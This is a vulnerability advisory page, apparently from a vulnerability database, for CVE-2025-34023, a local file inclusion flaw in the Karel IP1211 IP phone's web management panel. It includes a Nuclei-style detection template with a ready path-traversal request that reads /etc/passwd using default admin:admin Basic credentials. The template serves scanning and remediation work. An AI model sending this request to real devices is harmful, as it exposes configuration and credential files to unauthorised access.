漏洞描述
Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
CVE-2025-34023: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
PoC代码[已公开]
id: CVE-2025-34023
info:
name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
author: 0x_Akoko
severity: high
description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
impact: |
Attackers can read arbitrary files including sensitive configuration and credential files stored on the device through path traversal in the page parameter.
remediation: |
Update Karel IP Phone IP1211 firmware to the latest version that properly validates file paths, or restrict access to the cgiServer.exx endpoint.
reference:
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
- https://nvd.nist.gov/vuln/detail/CVE-2025-34023
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-34023
epss-score: 0.01848
epss-percentile: 0.8252
cwe-id: CWE-22
metadata:
max-request: 1
tags: cve,cve2025,karel,lfi,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
headers:
Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100effa92a7f1c7967d632fefc5097d2f6f44c40781426f1a7db1de5f1837a52985022011d0909b0187bdc9272602a87a587e735dcd3a8c9cc5f81ca989e1f0a3858c2e:922c64590222798bb761d5b6d8e72950